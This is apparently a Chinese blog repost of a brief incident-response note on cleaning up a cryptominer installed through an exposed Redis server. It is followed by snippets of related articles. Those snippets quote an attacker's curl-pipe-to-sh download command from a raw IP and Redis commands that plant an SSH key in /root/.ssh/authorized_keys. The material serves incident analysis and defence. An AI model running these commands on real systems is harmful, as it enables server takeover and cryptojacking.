利用redis 漏洞入侵挖矿临时解决办法

最新推荐文章于 2024-04-20 03:43:04 发布
最新推荐文章于 2024-04-20 03:43:04 发布
阅读量364 收藏
点赞数
文章标签: 数据库 开发工具
原文链接:http://www.cnblogs.com/yang68h/p/7422372.html
版权

top 看到一个bashd的进程占据了cpu

ps aux |grep bashd

cd /tmp 发现ddg.2011 的文件。root dump.rdb 

在/root/.ssh  也有奇怪的文件

vim /etc/sshd/sshd_config 被人修改过

cd /var/spool/cron 被人加了新的crontab 全部删除,crontab 里面有他执行的脚本和命令,服务器ip;

在/etc/ 下有一个/etc/redis-sentinel.conf  监视redis 进程的配置文件

解决:

which bashd 找到路径,进入目录

kill bashd 进程,cat  /dev/null>bashd ;chattr +i bashd

转载于:https://www.cnblogs.com/yang68h/p/7422372.html

weixin_30955341
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
由于redis暴露外网未设置密码被挖矿问题处理
ZhengXinMing1998的博客
05-24 884
一、问题查找 接到腾讯云短信提醒,服务器可能被植入了挖矿程序。 1.于是top查看cpu占用,发现一个名为java8_8的程序会定时隔一段时间就占用系统特别高的cpu 2.检查系统中的定时任务 发现/etc/crontab文件中出现了可疑的定时任务,通过ip查找发现ip地址来自美国 3.检查系统启动项,发现启动项中确有java8_8-server,并且状态位enable的 二、问题处理 1.清除系统该进行的启动项:systemctl disable 服务名 2.查看进程的存储目录,rm -rf /
关于Redis未授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis未授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
RedisMiner应急
weixin_33701564的博客
01-02 130
转载来自:https://blog.51cto.com/bantu/2055465 1、关闭访问挖矿服务器访问 [root@fuwuqi~]# iptables -A INPUT -s xmr.crypto-pool.fr -j DROP [root@fuwuqi~]# iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP -a 表示附加 inpu...
卧槽~ 一文搞懂 Redis 挖矿原理及如何防范
最新发布
2401_84047990的博客
04-20 881
我还通过一些渠道整理了一些大厂真实面试主要有:蚂蚁金服、拼多多、阿里云、百度、唯品会、携程、丰巢科技、乐信、软通动力、OPPO、银盛支付、中国平安等初,中级,高级Java面试题集合,附带超详细答案,希望能帮助到大家。还有专门针对JVM、SPringBoot、SpringCloud、数据库、Linux、缓存、消息中间件、源码等相关面试题。《互联网大厂面试真题解析、进阶开发核心学习笔记、全套讲解视频、实战项目源码讲义》点击传送门即可获取!
记一次因为redis漏洞挖矿
啊鹏的博客
10-01 2823
问题:CPU一直100%,top看不到进程,无从下手,阿里云无限报异常文件下载,以及linux共享库预加载配置文件被篡改。 经百度,到解决办法: 参考文档:https://blog.csdn.net/leisure_life/article/details/82899703 https://blog.csdn.net/leisure_life/article/details/82905256...
Linux Redis自动化挖矿感染蠕虫分析及安全建议
A_991128a的博客
01-11 372
自从Redis未授权问题获取Linux系统root权限的攻击方法的披露后,由于其易用性,利用该问题入侵Linux服务进行挖矿、扫描等的黑客行为一直层出不穷;而在众多利用该问题入侵服务器进行黑产行为的案例中,其中就存在一类利用该问题进行挖矿并且会利用pnscan自动扫描感染其他机器;该类攻击一直存在,不过在近期又呈现数量增加的趋势,在最近捕获到多次,我们针对其做下具体的分析。
服务器Redis实例中挖矿病毒排查及处理
wejack的专栏
01-20 714
文章系转载,方便整理和归纳,源文地址 https://z.itpub.net/article/detail/E0D0607EFA91E5FA88035F74D040DD26 巧不巧的我的服务器也被挖矿了,应该就是这个方法搞的 却说这一日,Redis正如往常一般工作,不久便收到了一条SAVE命令。 虽说这Redis常被用来当做缓存,数据只存在于内存中,却也能通过SAVE命令将内存中的数据保存到磁盘文件中以便持久化存储。 只见Redis刚打开文件,准备写入,不知何处突然冲出几个大汉将其擒住。 到底是怎么回事.
Redis 出现错误1067的解决办法
12-16
Redis 出现错误1067的解决办法 一、问题描述: 在Windows启动Redis服务时,发生如下错误: Windows无法启动Redis服务(位于本地计算机上)。 错误1067:进程意外终止。      在Windows CMD命令行启动时提示: ...
Redis常见漏洞利用方法总结1
08-03
Redis(Remote Dictionary Server ),即远程字典服务,是个开源的使 ANSI C 语编写、持络、可基于内存亦可持久化的志型、Key-
redis 挖矿木马清除
wasd986523的博客
06-03 772
redis 挖矿木马清除 https://www.360zhijia.com/anquan/447557.html https://github.com/MoreSecLab/DDG_MalWare_Clean_Tool
Linux挖矿病毒排查(通过redis入侵服务器原理)
程序员阿飘 的博客
01-11 1296
3.将公钥写入目标机器的authorized_keys 文件* cat foo | redis-cli -h 12.34.56.78 -x set crackit* redis-cli -h 12.34.56.78* config set dir /root/.ssh/* config get dir* config set dbfilename "authorized_keys"执行程序在/tmp下2.find / -name qW3xT.4, find / -name ddgs.3016;
记一次因redis未授权访问漏洞被攻击进行挖矿
12-05 895
一、问题描述 redis存储的业务数据被清空,且被注入未知的url下载链接: cur -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh 百度该链接后,发现是这是一段带有恶意链接脚本,进行恶意shell脚本下载,从而实现远程代码攻击,并进行挖矿行为。 二、分析 分析参考链接: https://www.freebuf.com/c...
服务器遭黑客入侵,被当作挖矿机器
QIANDXX的博客
02-08 564
完了,被黑了!
新手使用Redis时,被挖矿组织偷袭
weixin_55166254的博客
10-20 551
本文大概分析了,当你打开Redis访问权限后,系统是如何被一步步入侵的过程,并记录了一下当被入侵后的一些措施,另外我的知识简单的处理,可能病毒仍未清除干净,需要找更专业的文章进行排查
redis未授权导致服务器被挖矿分析(20220119)
fr1d4st的博客
01-27 2722
文章目录@[toc]0x00 背景0x01 现象0x02 临时处理0x03 溯源 0x00 背景 20220119收到阿里云报警短信 【阿里云】尊敬的******:云盾云安全中心检测到您的服务器:xx.xx.xx.xx(**)出现了紧急安全事件:挖矿程序,建议您立即登录云安全中心控制台-安全告警处理http://a.aliyun.com/f1. 进行处理 。 登录阿里云控制台后发现有多条异常记录 恶意脚本代码执行(curl -s -L http://xx.xx.xx.xx/f220115rr/
Redis未授权漏洞复现,利用其实现的挖矿蠕虫脚本分析
qq_53689523的博客
05-05 834
Redis未授权漏洞复现 挖矿蠕虫脚本分析 恶意代码分析实例
记一次 newinit.sh 相关病毒处理
muyu_feng的博客
09-26 4444
(ps:在这之前经历过五六次木马病毒攻击,都是搞个定时任务下载脚本,然后就拿你服务器搞事情。去年活动 我自己买了一台腾讯云服务器 100多 三年的(巨便宜,现在再也买不到 QAQ)自己玩的。然后服务器被挖矿被封了,钱倒是退了,可再也买不到这么便宜的服务起了。因为是刚弄的一台16G服务器,才部署2个项目运行几天一切正常。再次部署多实例时发现,已部署好的服务老是掉,项目日志一切正常,感觉不太正常。去查看 隐藏权限中会多了ai权限 ,它修改了很多文件权限。最后还是CPU100%的问题只能重启服务器,再看就好了。
基于Spring MVC + Spring + MyBatis的【学生管理管理系统】
D1561691的博客
04-12 734
我还通过一些渠道整理了一些大厂真实面试主要有:蚂蚁金服、拼多多、阿里云、百度、唯品会、携程、丰巢科技、乐信、软通动力、OPPO、银盛支付、中国平安等初,中级,高级Java面试题集合,附带超详细答案,希望能帮助到大家。还有专门针对JVM、SPringBoot、SpringCloud、数据库、Linux、缓存、消息中间件、源码等相关面试题。《互联网大厂面试真题解析、进阶开发核心学习笔记、全套讲解视频、实战项目源码讲义》点击传送门即可获取!帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
redis 漏洞利用
09-30
redis 漏洞利用可以通过redis-rogue-server工具来实现。该工具适用于目标存在Redis未授权访问漏洞时使用,无法对Redis密码进行认证。你可以从https://github.com/n0b0dyCN/redis-rogue-server下载该工具。请注意,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值